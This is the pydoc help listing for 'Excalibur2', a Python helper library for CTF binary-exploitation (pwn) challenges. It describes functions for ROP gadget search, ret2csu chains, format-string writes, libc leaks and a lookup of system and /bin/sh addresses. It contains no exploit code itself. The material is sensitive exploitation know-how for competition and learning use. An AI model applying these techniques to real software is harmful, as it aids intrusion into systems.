-
Notifications
You must be signed in to change notification settings - Fork 0
/
Excalibur2-help.txt
421 lines (329 loc) · 10.3 KB
/
Excalibur2-help.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
Help on package Excalibur2:
NAME
Excalibur2
DESCRIPTION
This module provides functionality for ctf pwn.
Including some common operations in learning and competitions
Welcome all masters to provide advice on the code
Please visit https://lmarch2.top/posts/8c945bd4/ for code details
--------------------------------------
Excalibur -- Sword of Contract Victory
--------------------------------------
Example:
>>> from Excalibur2 import*
PACKAGE CONTENTS
Excalibur2
FUNCTIONS
ROPgadget(bin, order, gr='', *option)
------
Descriptions
find gadgets you want using ROPgadget
使用ROPgadget找到想要的gadget
------
Parameters
bin : binary file
order : gadget you want
gr : using grep (1) or not (0)
option : to find a string
------
Returns
elfbase + add
cl lambda (...)
# close()
contextset(ar=64, de=1)
------
Descriptions
set your structure and debug mode
设置文件架构和调试模式
------
Parameters
ar : choose arch for amd64 (64) or i386 (32)
de : using debug mode (1) or not (0)
------
Returns
None
csu(rbx, rbp, r12, r13, r14, r15, csu_end_addr, csu_front_addr, last)
------
Descriptions
ret2csu utilizes rop chain
ret2csu利用rop链
# pop rbx,rbp,r12,r13,r14,r15
# rbx should be 0,
# rbp should be 1,enable not to jump
# r12 should be the function we want to call
# rdi=edi=r15d
# rsi=r14
# rdx=r13
------
Parameters
rbx, rbp, r12, r13, r14, r15 : registers
csu_end_addr,csu_front_addr, last : gadgets
------
Returns
binsh, system
debug(c=0)
------
Descriptions
debug
To use gdb debugging, please use the command line parameter G, such as: python3 exp.py G
调试
若要使用gdb调试,请使用命令行参数G,如:python3 exp.py G
------
Parameters
c : gdb attach上进程之后执行的命令字符串 (0)
------
Returns
None
el(arg='pwn')
------
Descriptions
load elf, default filename pwn
加载elf,默认文件名是pwn
------
Parameters
arg : the path of elf
------
Returns
None
elsym(add)
------
Descriptions
set elfbase for binary
基址和偏移相加得到真实地址
------
Parameters
add : the addr needed to be added
------
Returns
elfbase + add
fmt(offset, begin, end, size, written)
------
Descriptions
fmt attack
fmt攻击
------
Parameters
offset : fmt 偏移
begin : 背写的地址
end : 写入的地址
size : 写入的格式化字符串形式
wriiten : printf函数已写入的字节数
------
Returns
elfbase + add
# offset(int) - 您控制的第一个格式化程序的偏移量
# 字典(dict) - 被写入地址对应->写入的数据,可多个对应{addr: value, addr2: value2}
# numbwritten(int) - printf函数已写入的字节数
# write_size(str) - 必须是byte,short或int。告诉您是否要逐字节写入,短按short或int(hhn,hn或n)
get_addr32()
------
Descriptions
Receive leaked 32-bit libc address
接收泄露的32位libc地址
------
Parameters
None
------
Returns
recieved addr
get_addr64()
------
Descriptions
Receive leaked 64-bit libc address
接收泄露的64位libc地址
------
Parameters
None
------
Returns
recieved addr
got(fun, *pie_base)
------
Descriptions
Binary file function got address offset
二进制文件函数got表地址偏移
------
Parameters
fun : function name
pie_base (optional) : the binary base when pie enabled
------
Returns
got addr of func
ia lambda (...)
# interactive()
int16 lambda data
# int(data,16)
lg lambda name, addr
# log.success(name+'='+hex(addr))
lib(arg='/usr/lib/x86_64-linux-gnu/libc.so.6')
------
Descriptions
load libc, default local system libc
加载libc,默认本地系统libc
------
Parameters
arg : the path of libc
------
Returns
None
libcsym(fun, off=0)
------
Descriptions
libc function address offset
libc文件函数地址偏移
用于计算一两个libc函数地址时比较方便
------
Parameters
fun : function name
off (optional) : the libc base when pie enabled
------
Returns
addr of libc func
lisym(add)
------
Descriptions
set elfbase for binary
基址和偏移相加得到真实地址
------
Parameters
add : the addr needed to be added
------
Returns
libcbase + add
plt(fun, *pie_base)
------
Descriptions
Binary file function plt address offset
二进制文件函数plt表地址偏移
------
Parameters
fun : function name
pie_base (optional) : the binary base when pie enabled
------
Returns
plt addr of func
pr(addr)
print abbreviation
打印
prb(data)
------
Descriptions
print raw bytes without escaping
不转义打印原始字符串
------
Parameters
data : the data you want to print
------
Returns
None
prh(addr)
print Hexadecimal data abbreviation
打印十六进制
prl(addr)
print length of data abbreviation
打印数据长度
proc(bin)
------
Descriptions
load binary when no command line parameter R provided
没有命令行参数R时加载二进制文件
------
Parameters
bin : the path of binary
------
Returns
p
rc lambda (...)
# recv()
rec lambda data
# recv(data)
remo(ip, port='')
------
Descriptions
connect to remote when command line parameter R provided
有命令行参数R时连接到远程
------
Parameters
ip : ip of remote
port: port of remote
using remo(ip) when given ip = ip:port or ip = ip port
using remo(ip,port) when given ip and port
------
Returns
p
ru lambda delims, drop=True
# recvuntil(delims,drop)
sd lambda data
# send(data)
sda lambda delim, data
# sendafter(delim,data)
searchlibc(fun, real_addr, agu=0, offset=0)
------
Descriptions
Determine the libc version from the leaked function real address and return /bin/sh string address and system function address
由泄露的函数真实地址确定libc版本,并返回/bin/sh字符串地址和system函数地址
------
Parameters
fun : function name
real_addr =: leaked real addr of func
agu : flag of using libc (1) or libcsearcher (0)
offset : the offset between leaked addr and base addr of func
------
Returns
binsh, system
setbase(add)
------
Descriptions
Add the base address and offset to get the real address
给二进制文件设置基址
------
Parameters
add : the base addr of binary
------
Returns
None
setlibcbase(add)
------
Descriptions
Add the base address and offset to get the real address
给libc设置基址
------
Parameters
add : the base addr of binary
------
Returns
None
setterminal(termin='tmux', *args)
------
Descriptions
set debug terminal
设置调试终端
------
Parameters
termin : debug terminal (default tmux)
args (optional) : context.terminal = [termin,args]
------
Returns
None
sl lambda data
# sendline(data)
sla lambda delim, data
# sendlineafter(delim,data)
sym(fun, *pie_base)
------
Descriptions
Binary file function address offset
二进制文件函数地址偏移
------
Parameters
fun : function name
pie_base (optional) : the binary base when pie enabled
------
Returns
addr of func
uu32 lambda data
# u32(data.ljust(4,b'\x00'))
uu64 lambda data
# u64(data.ljust(8,b'\x00'))
FILE
/home/lctfer/.local/lib/python3.10/site-packages/Excalibur2/__init__.py